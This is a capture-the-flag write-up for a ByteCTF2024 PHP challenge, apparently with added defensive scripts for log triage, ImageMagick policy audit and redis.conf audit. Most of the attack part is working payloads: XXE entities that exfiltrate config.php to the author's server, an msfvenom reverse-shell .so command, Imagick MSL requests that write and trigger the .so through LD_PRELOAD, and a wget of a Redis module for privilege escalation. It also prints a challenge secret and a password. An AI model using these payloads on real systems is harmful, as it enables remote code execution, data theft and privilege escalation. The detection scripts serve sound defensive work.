Posting a picture first to anchor the thread.
This time I was carried by Harder, but at least my contribution score in the competition is finally no longer zero.
Overall analysis
<?php
ini_set("display_errors", "On");
include_once("config.php");   // defines $secret
if (isset($_GET['so']) && isset($_GET['key'])) {
    // With the secret, any numeric name under /tmp becomes an LD_PRELOAD library
    // for every process PHP spawns afterwards; /tmp is listed first.
    if (is_numeric($_GET['so']) && $_GET['key'] === $secret) {
        array_map(function($file) { echo $file . "\n"; }, glob('/tmp/*'));
        putenv("LD_PRELOAD=/tmp/".$_GET['so'].".so");
    }
}
if (isset($_GET['byte']) && isset($_GET['ctf'])) {
    // Instantiates an arbitrary class with attacker-chosen constructor arguments.
    $a = new ReflectionClass($_GET['byte']);
    $b = $a->newInstanceArgs($_GET['ctf']);
} elseif (isset($_GET['clean'])) {
    array_map('unlink', glob('/tmp/*'));   // wipes /tmp
} else {
    highlight_file(__FILE__);
    echo 'Hello ByteCTF2024!';
}
(The page also links to phpinfo.html; the default branch prints "Hello ByteCTF2024!".)
From the analysis, the goal is to load a malicious .so through LD_PRELOAD,
but that first requires getting through the PHP reflection instantiation ↓
$a = new ReflectionClass($_GET['byte']);
$b = $a->newInstanceArgs($_GET['ctf']);
So we need to upload a .so file, read the secret from config.php, and run something that triggers the .so.
Next, looking at phpinfo.html, remote file inclusion is enabled and SimpleXML is present.
The theory holds; on to practice.
SimpleXMLElement XXE
Reference: "2018 SUCTF Homework XXE out-of-band data ~~ XXE for SSRF_[suctf 2018]homework" - CSDN blog
Create load.xml on the VPS ↓
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE try[
<!ENTITY % int SYSTEM "http://www.7ntsec.cn:8000/e.xml">
%int;
%all;
%send;
]>
and e.xml (the file fetched by the %int entity):
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=config.php">
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://www.7ntsec.cn:8000/?%payl;'>">
Fire it directly: ?byte=SimpleXMLElement&ctf[]=http://www.7ntsec.cn:8000/load.xml&ctf[]=2&ctf[]=true
This returns the contents of config.php:
<?php
$secret = "HelloByteCTF2024";
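From a defender's side, the whole chain so far (user-selected class through ReflectionClass, XXE via SimpleXMLElement with LIBXML_NOENT, then the key=/so= request that sets LD_PRELOAD) is visible in the web server's access log. The following is an added example, not code from the write-up: it scans constructed combined-format log lines (the request targets mirror the ones in this post, with the secret replaced by a placeholder) and names the indicator each one matches.

```python
"""Access-log triage for the chain described above (added example, not from
the original write-up). The log lines are constructed; the request targets
mirror the ones shown in this post with the secret redacted."""
import re
from urllib.parse import parse_qs, urlsplit

# Classes whose constructor does real work on attacker-controlled arguments
# (parse XML, run an ImageMagick coder, open files); letting a user pick
# these via ReflectionClass::newInstanceArgs is the root cause here.
RISKY_CLASSES = {"SimpleXMLElement", "Imagick", "DOMDocument", "SplFileObject"}

# Argument prefixes that mean "fetch something remote, run a stream filter,
# or point ImageMagick at a script/temp file".
RISKY_ARG = re.compile(r"^(https?://|ftp://|php://|data:|vid:|msl:|/tmp/)", re.I)

# "METHOD target HTTP/x.y" as found in the combined log format.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def analyse_request(target: str) -> list[str]:
    """Return the indicator names matched by a single request target."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    findings: list[str] = []
    cls = params.get("byte", [""])[0]
    args = params.get("ctf[]", []) + params.get("ctf", [])
    if cls in RISKY_CLASSES:
        findings.append(f"reflection:{cls}")
    if any(RISKY_ARG.match(a) for a in args):
        findings.append("reflection-arg:wrapper-or-url")
    if "so" in params and "key" in params:      # the putenv("LD_PRELOAD=...") branch
        findings.append("ld_preload:putenv")
    if "clean" in params:                       # mass unlink of /tmp/* (anti-forensics)
        findings.append("tmp-cleanup")
    return findings


def scan_log(lines):
    """Yield (line, findings) for each log line carrying at least one indicator."""
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        findings = analyse_request(m.group("target"))
        if findings:
            yield line, findings


# Constructed sample log (combined format); the secret is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Sep/2024:10:00:01 +0000] "GET /?byte=SimpleXMLElement&ctf[]=http://attacker.example/load.xml&ctf[]=2&ctf[]=true HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Sep/2024:10:00:02 +0000] "POST /?byte=Imagick&ctf[]=vid:msl:/tmp/php* HTTP/1.1" 200 12',
    '10.0.0.5 - - [20/Sep/2024:10:00:03 +0000] "GET /?key=SECRET_PLACEHOLDER&so=2 HTTP/1.1" 200 40',
    '10.0.0.5 - - [20/Sep/2024:10:00:04 +0000] "POST /?byte=Imagick&ctf[]=/tmp/ss.wmv HTTP/1.1" 500 0',
    '10.0.0.9 - - [20/Sep/2024:10:00:05 +0000] "GET /?byte=stdClass&ctf[]=1 HTTP/1.1" 200 10',
    '10.0.0.9 - - [20/Sep/2024:10:00:06 +0000] "GET / HTTP/1.1" 200 3200',
]

if __name__ == "__main__":
    for line, findings in scan_log(SAMPLE_LOG):
        print(", ".join(findings), "<-", line.split('"')[1])
```

The class allowlist and argument prefixes are the tunable parts; on a real application the fix is of course to never hand a user-chosen class name to ReflectionClass at all, and to construct SimpleXMLElement without LIBXML_NOENT.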
Imagick file write + LD_PRELOAD RCE
Reference: "LD_PRELOAD & putenv() explained in depth" - Anquanke (anquanke.com)
and
https://aecous.github.io/2023/06/27/Imagick%E8%A7%A6%E5%8F%91msl/
The first thing that comes to mind is the original 0CTF challenge: using Imagick together with LD_PRELOAD for escalation.
Principle
Reference: "TCTF2019 WallBreaker-Easy write-up" - Xianzhi community (aliyun.com)
When ImageMagick loads some obscure image formats such as wmv, it invokes the external command ffmpeg.
So, by LD_PRELOAD-ing a malicious .so into that ffmpeg call, RCE is achieved. But how do we get the file onto the box?
From the MSL material we know that the filename attribute combined with the data:// pseudo-protocol can write files. With the steps clear, on to practice.
Concrete steps
Upload the required malicious .so
Because a .so compiled with gcc produces a payload too large to write out successfully, I generated one with msf directly
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=8.134.221.106 lport=5555 -f elf-so > 3.so
cat 3.so | base64
Combined with the fact that PHP first saves uploaded files under /tmp, construct the payload:
POST /?byte=Imagick&ctf[]=vid:msl:/tmp/php* HTTP/1.1
Host: a588f33e.clsadp.com
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3FMDC1bmmLUmX70G
Content-Length: 1033
------WebKitFormBoundary3FMDC1bmmLUmX70G
Content-Disposition: form-data; name="exec"; filename="exec.msl"
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="inline:data:text/8BIM;base64,f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC…(base64 truncated)…" />
<write filename="8BIM:/tmp/2.so" />
</image>
------WebKitFormBoundary3FMDC1bmmLUmX70G
Next, write the file that will trigger the ffmpeg call
POST /?byte=Imagick&ctf[]=vid:msl:/tmp/php* HTTP/1.1
Host: a588f33e.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeTvfNEmqTayg6bqr
Content-Length: 681
------WebKitFormBoundaryeTvfNEmqTayg6bqr
Content-Disposition: form-data; name="123"; filename="exesc.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="inline:data://image/x-portable-anymap;base64,UDYKOSA5CjI1NQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF8TzoxMzoiZnVtb19iYWNrZG9vciI6NDp7czo0OiJwYXRoIjtzOjExOiIvdG1wL0FlY291cyI7czo0OiJhcmd2IjtOO3M6NDoiZnVuYyI7TjtzOjU6ImNsYXNzIjtOO30=" />
<write filename="/tmp/ss.wmv" />
</image>
------WebKitFormBoundaryeTvfNEmqTayg6bqr--
Set the environment variable
GET /?key=HelloByteCTF2024&so=2 HTTP/1.1
Host: a588f33e.clsadp.com
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://828c8beb.clsadp.com/?byte=Imagick&ctf[]=php://input
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Trigger loading of the .so:
POST /?byte=Imagick&ctf[]=/tmp/ss.wmv HTTP/1.1
Host: ca7489ef.clsadp.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeTvfNEmqTayg6bqr
Content-Length: 681
------WebKitFormBoundaryeTvfNEmqTayg6bqr
Content-Disposition: form-data; name="123"; filename="exesc.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="inline:data://image/x-portable-anymap;base64,UDYKOSA5CjI1NQpBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF8TzoxMzoiZnVtb19iYWNrZG9vciI6NDp7czo0OiJwYXRoIjtzOjExOiIvdG1wL0FlY291cyI7czo0OiJhcmd2IjtOO3M6NDoiZnVuYyI7TjtzOjU6ImNsYXNzIjtOO30=" />
<write filename="/tmp/ss.wmv" />
</image>
------WebKitFormBoundaryeTvfNEmqTayg6bqr--
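The Imagick part of the chain (principle and steps above) only works because the ImageMagick policy lets the MSL, VID and 8BIM coders run. As an added example, not from the write-up or from ImageMagick itself, the script below audits a policy.xml for exactly those coders. It reproduces the rule ImageMagick applies in policy.c: a right is denied as soon as any policy whose domain and pattern match does not grant it. The two policy documents at the bottom are constructed for the example; treating a policy with no rights attribute as granting everything is my own conservative assumption for audit purposes.

```python
"""Audit an ImageMagick policy.xml for the coders used in the Imagick step of
this write-up (added example, not from the original post). ImageMagick's
policy check (policy.c) denies a right as soon as ANY policy whose domain and
pattern match lacks that right; this script reproduces that rule. The policy
documents at the bottom are constructed for the example."""
import fnmatch
import xml.etree.ElementTree as ET

# (coder, right) pairs that the write-up's chain depends on:
#   MSL  read  - an MSL script is executed when it is "read" as an image
#   VID  read  - the vid: coder was fed msl:/tmp/php* to reach the MSL coder
#   8BIM write - the format used to write the uploaded .so to /tmp
# plus the Ghostscript-backed formats that most distributions already deny.
CHECKS = [("MSL", "read"), ("VID", "read"), ("8BIM", "write"),
          ("PS", "read"), ("PDF", "read")]


def _expand(pattern: str) -> list[str]:
    """Expand the {A,B,C} list form used in stock policy files into single globs."""
    p = pattern.strip()
    if p.startswith("{") and p.endswith("}"):
        return [x.strip().upper() for x in p[1:-1].split(",")]
    return [p.upper()]


def _rights(value: str) -> set[str]:
    """Parse rights="none" / "read|write" / "all" into a set of right names."""
    toks = {t.strip().lower() for t in value.split("|")}
    toks.discard("none")
    return {"read", "write", "execute"} if "all" in toks else toks


def coder_policies(policy_xml: str) -> list[tuple[str, set[str]]]:
    """All <policy domain="coder"> entries as (glob, rights) in document order.
    A missing rights attribute is treated (assumption, conservative) as 'all'."""
    root = ET.fromstring(policy_xml)
    out = []
    for pol in root.iter("policy"):
        if pol.get("domain") == "coder" and pol.get("pattern"):
            for glob in _expand(pol.get("pattern")):
                out.append((glob, _rights(pol.get("rights", "all"))))
    return out


def is_allowed(policies, coder: str, right: str) -> bool:
    """A right survives only if every matching policy grants it (match is case-insensitive)."""
    return all(right in rights
               for glob, rights in policies
               if fnmatch.fnmatchcase(coder.upper(), glob))


def audit_policy(policy_xml: str) -> list[str]:
    """Return 'CODER:right' for every check that the policy still permits."""
    policies = coder_policies(policy_xml)
    return [f"{c}:{r}" for c, r in CHECKS if is_allowed(policies, c, r)]


# Constructed: denies only the Ghostscript formats, leaves MSL/VID/8BIM open.
PERMISSIVE_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />
</policymap>"""

# Constructed: additionally denies the coders this chain needs, and all
# external delegates (which is what the ffmpeg call goes through).
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="{PS,PS2,PS3,EPS,PDF,XPS}" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="VID" />
  <policy domain="coder" rights="none" pattern="8BIM" />
  <policy domain="delegate" rights="none" pattern="*" />
</policymap>"""

if __name__ == "__main__":
    print("permissive still allows:", audit_policy(PERMISSIVE_POLICY))
    print("hardened still allows:  ", audit_policy(HARDENED_POLICY))
```

The audit only evaluates the coder domain; the delegate line in the hardened sample is shown because the ffmpeg invocation that LD_PRELOAD hijacks is a delegate, and denying delegates removes that step regardless of which coder reached it.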
Redis post-exploitation privilege escalation
Got a shell, but with low privileges.
start.sh shows that Redis is started. So I found redis.conf at the default path and found the password in it.
After logging in:
It does not look like master-slave replication is usable, so only malicious module loading is left.
wget http://www.7ntsec.cn/exp.so
chmod +x exp.so
redis-cli -h 127.0.0.1 -p 6379 -a bytectfa0d90b
module load "/tmp/exp.so"
Privilege escalation successful.
Solved.
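The Redis step succeeded for three reasons a config review would catch: the password sat in clear text in a readable redis.conf, the MODULE command was still enabled, and the instance ran with enough privilege that a loaded module escalated. As an added example, not from the write-up, the script below audits a redis.conf for the first two (the third is a process-ownership matter outside the file). Both configurations are constructed; the weak one resembles what the write-up describes.

```python
"""Audit a redis.conf for the weaknesses used in the post-exploitation step
of this write-up (added example, not from the original post): a password
stored in the config, MODULE LOAD left reachable, and an instance exposed
beyond loopback. Both configs below are constructed for the example."""
import shlex


def parse_redis_conf(text: str) -> list[tuple[str, list[str]]]:
    """Return (directive, args) pairs in file order; redis.conf is one directive per
    line, comments start with '#', and arguments may be quoted ("" is a valid one)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def _last(conf, directive):
    """Redis applies the last occurrence of a repeated directive."""
    hits = [args for d, args in conf if d == directive]
    return hits[-1] if hits else None


LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_redis_conf(text: str) -> list[str]:
    conf = parse_redis_conf(text)
    findings = []

    # Reachability: anything other than loopback addresses ("-" marks an optional
    # address in Redis 7 syntax, e.g. "bind 127.0.0.1 -::1").
    bind = _last(conf, "bind") or []
    if not bind or any(b.lstrip("-") not in LOOPBACK for b in bind):
        findings.append("bind-not-loopback")
    pm = _last(conf, "protected-mode") or ["yes"]
    if pm[0].lower() != "yes":
        findings.append("protected-mode-off")

    # Authentication: requirepass is stored in clear text, so the file itself
    # must be unreadable to other local users; a short value is also guessable.
    pw = _last(conf, "requirepass")
    if not pw or not pw[0]:
        findings.append("no-requirepass")
    elif len(pw[0]) < 16:
        findings.append("weak-requirepass")

    # Arbitrary-code path: MODULE LOAD of an attacker-written .so. Blocked by
    # renaming MODULE to "" (all versions) or enable-module-command no (Redis 7+,
    # the default there). Without either directive we assume an older Redis
    # where MODULE is enabled.
    renamed = any(d == "rename-command" and len(a) == 2
                  and a[0].upper() == "MODULE" and a[1] == ""
                  for d, a in conf)
    enable = _last(conf, "enable-module-command")
    if not renamed and (enable is None or enable[0].lower() != "no"):
        findings.append("module-load-allowed")
    return findings


# Constructed: resembles the configuration the write-up found.
WEAK_CONF = """port 6379
bind 0.0.0.0
protected-mode no
requirepass s3cret
daemonize yes
"""

# Constructed: same instance with the reachable attack paths closed.
HARDENED_CONF = """port 6379
bind 127.0.0.1 -::1
protected-mode yes
requirepass 7b1f9c0e4d2a6e8f5a3c1b9d0e2f4a6c
rename-command MODULE ""
rename-command CONFIG ""
enable-module-command no
daemonize yes
"""

if __name__ == "__main__":
    print("weak:    ", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

Even a clean audit result does not help if redis-server runs as root and redis.conf is world-readable: run it as a dedicated unprivileged user and restrict the config file's permissions, since a local low-privilege shell is exactly the position this write-up starts the Redis step from.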